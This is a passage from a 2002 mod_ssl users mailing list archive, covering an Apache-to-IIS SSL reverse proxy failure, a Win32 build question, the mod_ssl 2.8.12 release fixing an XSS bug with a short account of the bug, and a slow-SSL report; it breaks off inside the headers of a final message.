  openssl s_client -connect IIS-server:443  -cert user.crt -key
     user.key -CAfile ca-bundle.crt
  GET / HTTP/1.0

  

Originally when I tried the reverse proxy to the IIS server I would
get a segmentation fault in ssl_engine_kernel.c.  For some reason
info->x_pkey was a NULL pointer.  I modified the code shown below to
get around this:

$ diff ssl_engine_kernel.c{.ORIG,}
1606,1607c1606,1609
<     *pkey = info->x_pkey->dec_pkey; \
<     EVP_PKEY_reference_inc(*pkey)
---
>     if (info->x_pkey != 0) { \
>         *pkey = info->x_pkey->dec_pkey; \
>         EVP_PKEY_reference_inc(*pkey); \
>     }

Now when I use openssl to connect to the reverse proxy I get:

HTTP/1.1 502 Proxy Error
Date: Wed, 23 Oct 2002 01:00:39 GMT
Server: Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6g DAV/2
Content-Length: 453
Connection: close
Content-Type: text/html; charset=iso-8859-1



502 Proxy Error


Proxy Error


The proxy server received an invalid
response from an upstream server.

The proxy server could not handle the request GET /.

Reason: Error reading from remote server




Apache/2.0.43 Server at host Port 443


read:errno=0

The Apache error log shows:

[Tue Oct 22 17:31:19 2002] [info] Connection: Client IP: xxx.xxx.xxx.xxx,
Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
[Tue Oct 22 17:31:19 2002] [error] SSL error on reading data
[Tue Oct 22 17:31:19 2002] [error] SSL Library Error: 336162922
error:1409706A:lib(20):func(151):reason(106)
[Tue Oct 22 17:31:19 2002] [error] [client xxx.xxx.xxx.xxx] proxy: error
reading status line from remote server IIS-server
[Tue Oct 22 17:31:19 2002] [error] [client xxx.xxx.xxx.xxx] proxy: Error
reading from remote server returned by /
[Tue Oct 22 17:31:19 2002] [debug] ssl_engine_kernel.c(1866): OpenSSL:
Write: SSL negotiation finished successfully
[Tue Oct 22 17:31:19 2002] [info] Connection to child 1 closed with
standard shutdown(server host:443, client xxx.xxx.xxx.xxx)
[Tue Oct 22 17:31:19 2002] [debug] ssl_engine_kernel.c(1866): OpenSSL:
Write: SSL negotiation finished successfully
[Tue Oct 22 17:31:19 2002] [info] Connection to child 1 closed with
standard shutdown(server host:443, client xxx.xxx.xxx.xxx)

I don't know enough about SSL to know what is going on.  It looks like
the SSL_read() is failing but I do not know why.  If I don't get
anywhere with this i'm thinking about trying the expermental code in
Apache 1.3.27 to see if I have any luck.  Any input would be welcome.
Thanks.

  Keith
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 09:13:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA03647; Wed, 23 Oct 2002 09:12:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA03628; Wed, 23 Oct 2002 09:11:10 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8122E4CE738; Wed, 23 Oct 2002 09:11:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E2DBA286DB; Wed, 23 Oct 2002 09:07:43 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from ewt.com.tw id GAA28620; Wed, 23 Oct 2002 06:08:15 +0200 (MET DST)
Received: from eric([210.243.144.187]) by RaidenMAILD([210.243.144.188]); Wed, 23 Oct 2002 12:07:55 +0800
From: "Eric Lin" 
To: 
Subject: Building mod_SSL with SSL_EXPERIMENTAL in Win32!
Date: Wed, 23 Oct 2002 12:06:52 +0800
Message-ID: <005101c27a49$a0f865b0$bb90f3d2@eric>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0052_01C27A8C.AF1BA5B0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Eric Lin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0052_01C27A8C.AF1BA5B0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hi All,
 
I am building mod_SSL with Apache 1.3.26 on Win32 using nCipher SSL
accelerator.
But I have some problem.
I can use "c:\openssl\openssl speed -engine chil" successfully.
But when I want to build mod_SSL with SSL_EXPERIMENTAL option, but I
found there is no such option in Win32 edition!
Does any one have solution to this problem?
 
EAST WIND TECHNOLOGIES, INC.
ERIC    LIN 
 

------=_NextPart_000_0052_01C27A8C.AF1BA5B0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






















Hi All,



 



I am building mod_SSL with
Apache 1.3.26 on Win32 using nCipher SSL =
accelerator.



But I have some =
problem.



I can use “c:\openssl\openssl speed =
–engine
chil” =
successfully.



But when I want to build mod_SSL
with SSL_EXPERIMENTAL option, but I found there is no such option in =
Win32
edition!



Does any one have solution to this =
problem?



 



EAST WIND TECHNOLOGIES, =
INC.



ERIC    =
LIN 



 









------=_NextPart_000_0052_01C27A8C.AF1BA5B0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 11:03:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA07258; Wed, 23 Oct 2002 11:02:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.sogei.it id LAA07247; Wed, 23 Oct 2002 11:01:38 +0200 (MET DST)
Received: from mailfilter01.domus.ad.sogei.it (mailfilter01.sogei.it [26.2.193.99])
          by mail.sogei.it (8.11.4/8.8.4) with SMTP
	  id g9N5dne09608 for ; Wed, 23 Oct 2002 07:39:50 +0200
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: R: SSL reverse proxy using certificates to IIS server
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Wed, 23 Oct 2002 11:01:33 +0200
Message-ID: 
Thread-Topic: SSL reverse proxy using certificates to IIS server
Thread-Index: AcJ6MfVOZCmDSsIQRmSiua7a/sgFWQAP9tng
From: "CAMPETTO CLAUDIO" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id LAA07251
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "CAMPETTO CLAUDIO" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try putting this line in the server config:

SSLProxyProtocol SSLv3

Hope this helps. 

Claudio Campetto.
-----Messaggio originale-----
Da: Keith Sparacin [mailto:ksparacin@ti.com] 
Inviato: mercoledì 23 ottobre 2002 3.15
A: modssl-users@modssl.org
Oggetto: SSL reverse proxy using certificates to IIS server

Has anyone gotten an Apache 2.0.43 SSL reverse proxy working to an IIS
backend server requiring certificate verification on the IIS server
side?  I can reverse proxy Apache to an SSL Unix server and an SSL IIS
server (neither requiring certificates).  I can also reverse proxy
Apache to an SSL Unix server requiring certificate verification.  I
have not been able to get it working to an IIS server requiring
certificate verification.  I have verified that the Apache
certificates are valid using openssl to retrieve web pages from the
IIS server:

  openssl s_client -connect IIS-server:443  -cert user.crt -key
     user.key -CAfile ca-bundle.crt
  GET / HTTP/1.0

  

Originally when I tried the reverse proxy to the IIS server I would
get a segmentation fault in ssl_engine_kernel.c.  For some reason
info->x_pkey was a NULL pointer.  I modified the code shown below to
get around this:

$ diff ssl_engine_kernel.c{.ORIG,}
1606,1607c1606,1609
<     *pkey = info->x_pkey->dec_pkey; \
<     EVP_PKEY_reference_inc(*pkey)
---
>     if (info->x_pkey != 0) { \
>         *pkey = info->x_pkey->dec_pkey; \
>         EVP_PKEY_reference_inc(*pkey); \
>     }

Now when I use openssl to connect to the reverse proxy I get:

HTTP/1.1 502 Proxy Error
Date: Wed, 23 Oct 2002 01:00:39 GMT
Server: Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6g DAV/2
Content-Length: 453
Connection: close
Content-Type: text/html; charset=iso-8859-1



502 Proxy Error


Proxy Error


The proxy server received an invalid
response from an upstream server.

The proxy server could not handle the request GET /.

Reason: Error reading from remote server




Apache/2.0.43 Server at host Port 443


read:errno=0

The Apache error log shows:

[Tue Oct 22 17:31:19 2002] [info] Connection: Client IP: xxx.xxx.xxx.xxx,
Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
[Tue Oct 22 17:31:19 2002] [error] SSL error on reading data
[Tue Oct 22 17:31:19 2002] [error] SSL Library Error: 336162922
error:1409706A:lib(20):func(151):reason(106)
[Tue Oct 22 17:31:19 2002] [error] [client xxx.xxx.xxx.xxx] proxy: error
reading status line from remote server IIS-server
[Tue Oct 22 17:31:19 2002] [error] [client xxx.xxx.xxx.xxx] proxy: Error
reading from remote server returned by /
[Tue Oct 22 17:31:19 2002] [debug] ssl_engine_kernel.c(1866): OpenSSL:
Write: SSL negotiation finished successfully
[Tue Oct 22 17:31:19 2002] [info] Connection to child 1 closed with
standard shutdown(server host:443, client xxx.xxx.xxx.xxx)
[Tue Oct 22 17:31:19 2002] [debug] ssl_engine_kernel.c(1866): OpenSSL:
Write: SSL negotiation finished successfully
[Tue Oct 22 17:31:19 2002] [info] Connection to child 1 closed with
standard shutdown(server host:443, client xxx.xxx.xxx.xxx)

I don't know enough about SSL to know what is going on.  It looks like
the SSL_read() is failing but I do not know why.  If I don't get
anywhere with this i'm thinking about trying the expermental code in
Apache 1.3.27 to see if I have any luck.  Any input would be welcome.
Thanks.

  Keith
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 11:17:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA07991; Wed, 23 Oct 2002 11:16:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from visp.engelschall.com id LAA07974; Wed, 23 Oct 2002 11:15:35 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EA14C4CE76E; Wed, 23 Oct 2002 11:15:34 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E1300286DB; Wed, 23 Oct 2002 11:15:19 +0200 (CEST)
Date: Wed, 23 Oct 2002 11:15:19 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.12
Message-ID: <20021023091519.GA22374@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Because of a found Cross-Side-Scripting (XSS) bug in mod_ssl, the fixed
maintainance version mod_ssl 2.8.12 is available for use with Apache
1.3.27.

http://www.modssl.org/source/
 ftp://ftp.modssl.org/source/
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.12 (04-Oct-2002 to 23-Oct-2002)

   *) Fixed potential Cross-Site-Scripting bug.

   *) Allow also 8192 bytes of shared memory data size.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 11:34:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA08389; Wed, 23 Oct 2002 11:33:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id LAA08383; Wed, 23 Oct 2002 11:32:59 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id LAA23359
	for ; Wed, 23 Oct 2002 11:32:53 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 23 Oct 2002 11:32:53 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6334.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: [ANNOUNCE] mod_ssl 2.8.12
Date: Wed, 23 Oct 2002 11:32:53 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB8021FC734@qeo00200>
Thread-Topic: [ANNOUNCE] mod_ssl 2.8.12
Thread-Index: AcJ6dR8wkFjrZuxNRM6964OZoxJacwAAbcMg
From: "Courtin Bert" 
To: 
X-OriginalArrivalTime: 23 Oct 2002 09:32:53.0810 (UTC) FILETIME=[29A3E920:01C27A77]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id LAA08386
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi list,

is there any information available regarding the mentioned
potential Cross-Side-Scripting bug?
(Any CERT/CC Advisory CA-xxxxx, BUGTRAQ-Messages etc...)


Thanks in advance & kind regards,

B. Courtin


> -----Original Message-----
> From: Ralf S. Engelschall [mailto:rse@engelschall.com]
> Sent: Wednesday, October 23, 2002 11:15 AM
> To: modssl-announce@modssl.org; modssl-users@modssl.org
> Subject: [ANNOUNCE] mod_ssl 2.8.12
> 
> 
> Because of a found Cross-Side-Scripting (XSS) bug in mod_ssl, 
> the fixed
> maintainance version mod_ssl 2.8.12 is available for use with Apache
> 1.3.27.
> 
> http://www.modssl.org/source/
>  ftp://ftp.modssl.org/source/
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com
> 
>   Changes with mod_ssl 2.8.12 (04-Oct-2002 to 23-Oct-2002)
> 
>    *) Fixed potential Cross-Site-Scripting bug.
> 
>    *) Allow also 8192 bytes of shared memory data size.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 11:50:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA08896; Wed, 23 Oct 2002 11:49:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from radish.cambridge.redhat.com id LAA08869; Wed, 23 Oct 2002 11:48:15 +0200 (MET DST)
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.5/8.12.5) with ESMTP id g9N9pxBq016435
	for ; Wed, 23 Oct 2002 10:51:59 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.5/8.12.5/Submit) id g9N9pwgr016433
	for modssl-users@modssl.org; Wed, 23 Oct 2002 10:51:58 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Wed, 23 Oct 2002 10:51:58 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.12
Message-ID: <20021023095158.GB15947@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <60F1F87A64834D45A1EBAE9618305FB8021FC734@qeo00200>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <60F1F87A64834D45A1EBAE9618305FB8021FC734@qeo00200>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Oct 23, 2002 at 11:32:53AM +0200, Courtin Bert wrote:
> is there any information available regarding the mentioned
> potential Cross-Side-Scripting bug?
> (Any CERT/CC Advisory CA-xxxxx, BUGTRAQ-Messages etc...)

Hi, here are the details:

Versions of mod_ssl older than 2.8.12 suffer from a cross-site-
scripting bug: mod_ssl will send the server name unescaped in the
response to an HTTP request on an SSL port.  This issue has been
assigned CVE CAN-2002-1157.

Like the other recent Apache XSS bugs, this only affects servers using
a combination of "UseCanonicalName off" (not the default in 1.3) and
wildcard DNS.  Apache 2.0/mod_ssl is not vulnerable since it already
escapes this HTML.

Regards,

joe

-- 
Joe Orton, Red Hat Europe, Stronghold Engineering
http://stronghold.redhat.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 15:59:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18019; Wed, 23 Oct 2002 15:58:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from util.ext.ti.com id PAA18013; Wed, 23 Oct 2002 15:57:46 +0200 (MET DST)
Received: from dlep7.itg.ti.com ([157.170.134.103])
	by util.ext.ti.com (8.12.6/8.12.6) with ESMTP id g9NDvdjh003647
	for ; Wed, 23 Oct 2002 08:57:39 -0500 (CDT)
Received: from dlep7.itg.ti.com (localhost [127.0.0.1])
	by dlep7.itg.ti.com (8.9.3/8.9.3) with ESMTP id IAA17325
	for ; Wed, 23 Oct 2002 08:57:38 -0500 (CDT)
Received: from par.itg.ti.com (par.itg.ti.com [172.25.63.194])
	by dlep7.itg.ti.com (8.9.3/8.9.3) with ESMTP id IAA17308
	for ; Wed, 23 Oct 2002 08:57:38 -0500 (CDT)
Received: from par.itg.ti.com (localhost [127.0.0.1])
	by par.itg.ti.com (8.12.3/8.12.3) with ESMTP id g9NDvbF0020508
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Wed, 23 Oct 2002 08:57:37 -0500 (CDT)
Received: (from keith@localhost)
	by par.itg.ti.com (8.12.3/8.12.3/Submit) id g9NDvbZ7020505;
	Wed, 23 Oct 2002 08:57:37 -0500 (CDT)
X-Authentication-Warning: par.itg.ti.com: keith set sender to ksparacin@ti.com using -f
To: modssl-users@modssl.org
Subject: Re: R: SSL reverse proxy using certificates to IIS server
References: 
From: Keith Sparacin 
Date: 23 Oct 2002 08:57:37 -0500
In-Reply-To: "CAMPETTO CLAUDIO"'s message of "Wed, 23 Oct 2002 11:01:33 +0200"
Message-ID: 
Lines: 15
User-Agent: Gnus/5.0807 (Gnus v5.8.7) XEmacs/21.1 (Channel Islands)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Keith Sparacin 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Claudio,

I tried that but no change.

  Keith

"CAMPETTO CLAUDIO"  writes:

> Try putting this line in the server config:
> 
> SSLProxyProtocol SSLv3
> 
> Hope this helps. 
> 
> Claudio Campetto.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 16:10:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA18961; Wed, 23 Oct 2002 16:09:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bru5-smtp-out1.be.uu.net id QAA18952; Wed, 23 Oct 2002 16:08:42 +0200 (MET DST)
Received: from srv-smtpout-pln1. (uu194-7-83-132.unknown.uunet.be [194.7.83.132])
	by bru5-smtp-out1.be.uu.net (8.11.6/8.11.2) with SMTP id g9NE8fK16669
	for ; Wed, 23 Oct 2002 16:08:41 +0200 (MET DST)
Received: from beela002.DLLife.net ([130.4.111.90])
 by srv-smtpout-pln1. (NAVGW 2.5.1.2) with SMTP id M2002102315495612053
 for ; Wed, 23 Oct 2002 15:49:56 +0200
From: erwin.vogeleer@deltalloydLife.be
Subject: SSL - MS Proxy 2.0 - MSIE6
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.10  March 22, 2002
Message-ID: 
Date: Wed, 23 Oct 2002 16:09:29 +0200
X-MIMETrack: Serialize by Router on srv-ln-pln1/DeltaLloydLife(Release 5.0.10 |March 22, 2002) at
 23/10/2002 16:09:30
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erwin.vogeleer@deltalloydLife.be
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear all,



I'm using:
Apache 1.3.26
mod_ssl: 2.8.10
openSSL: 0.9.6g

At the client site I use MSIE6 and I have a MS proxy 2.0.

When I enable SSL the connections/communication is very slooooow. If I
disable it, the site works perfect.

Does anybody have an idea?


thx
Erwin


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 16:21:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19301; Wed, 23 Oct 2002 16:20:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id QAA19291; Wed, 23 Oct 2002 16:19:52 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id g9NEJmHc005540
	for ; Wed, 23 Oct 2002 16:19:48 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id g9NEJleQ006903
	for ; Wed, 23 Oct 2002 16:19:48 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: SSL - MS Proxy 2.0 - MSIE6
Date: Wed, 23 Oct 2002 16:19:47 +0200
Message-ID: <484A6CA492BE654395D208B1D8D5393973A452@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: SSL - MS Proxy 2.0 - MSIE6
Importance: normal
Thread-Index: AcJ6nlnM4+wX+lVjSIiiet9eyLka0AAANlJQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

What spec do you have on the server and client?

-----Original Message-----
From: erwin.vogeleer@deltalloydLife.be
[mailto:erwin.vogeleer@deltalloydLife.be]
Sent: Mittwoch, 23. Oktober 2002 16:09
To: modssl-users@modssl.org
Subject: SSL - MS Proxy 2.0 - MSIE6


Dear all,



I'm using:
Apache 1.3.26
mod_ssl: 2.8.10
openSSL: 0.9.6g

At the client site I use MSIE6 and I have a MS proxy 2.0.

When I enable SSL the connections/communication is very slooooow. If I
disable it, the site works perfect.

Does anybody have an idea?


thx
Erwin


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 16:27:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19506; Wed, 23 Oct 2002 16:26:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bru5-smtp-out1.be.uu.net id QAA19496; Wed, 23 Oct 2002 16:25:26 +0200 (MET DST)
Received: from srv-smtpout-pln1. (uu194-7-83-132.unknown.uunet.be [194.7.83.132])
	by bru5-smtp-out1.be.uu.net (8.11.6/8.11.2) with SMTP id g9NEPPK21287
	for ; Wed, 23 Oct 2002 16:25:25 +0200 (MET DST)
Received: from beela002.DLLife.net ([130.4.111.90])
 by srv-smtpout-pln1. (NAVGW 2.5.1.2) with SMTP id M2002102316064016204
 for ; Wed, 23 Oct 2002 16:06:40 +0200
From: erwin.vogeleer@deltalloydLife.be
Subject: RE: SSL - MS Proxy 2.0 - MSIE6
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.10  March 22, 2002
Message-ID: 
Date: Wed, 23 Oct 2002 16:26:13 +0200
X-MIMETrack: Serialize by Router on srv-ln-pln1/DeltaLloydLife(Release 5.0.10 |March 22, 2002) at
 23/10/2002 16:26:14
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erwin.vogeleer@deltalloydLife.be
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


The server is running NT4 and the clients XP and win2000.





                                                                                                                                        
                      "Boyle Owen"                                                                                                      
                                                                           
                      m>                        cc:                                                                                     
                      Sent by:                  Subject:  RE: SSL - MS Proxy 2.0 - MSIE6                                                
                      owner-modssl-users                                                                                                
                      @modssl.org                                                                                                       
                                                                                                                                        
                                                                                                                                        
                      23/10/2002 16:19                                                                                                  
                      Please respond to                                                                                                 
                      modssl-users                                                                                                      
                                                                                                                                        
                                                                                                                                        




What spec do you have on the server and client?

-----Original Message-----
From: erwin.vogeleer@deltalloydLife.be
[mailto:erwin.vogeleer@deltalloydLife.be]
Sent: Mittwoch, 23. Oktober 2002 16:09
To: modssl-users@modssl.org
Subject: SSL - MS Proxy 2.0 - MSIE6


Dear all,



I'm using:
Apache 1.3.26
mod_ssl: 2.8.10
openSSL: 0.9.6g

At the client site I use MSIE6 and I have a MS proxy 2.0.

When I enable SSL the connections/communication is very slooooow. If I
disable it, the site works perfect.

Does anybody have an idea?


thx
Erwin


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 16:51:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20544; Wed, 23 Oct 2002 16:50:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from 611wexowa.cityofhouston.net id QAA20412; Wed, 23 Oct 2002 16:49:20 +0200 (MET DST)
Received: by 611wexowa.cityofhouston.net with Internet Mail Service (5.5.2653.19)
	id ; Wed, 23 Oct 2002 09:49:07 -0500
Message-ID: <8C6F8568E337D611BD7C0040A5B1B88D8793DD@611wex03.cityofhouston.net>
From: "Kong, Yi - HPL" 
To: "'modssl-users@modssl.org'" 
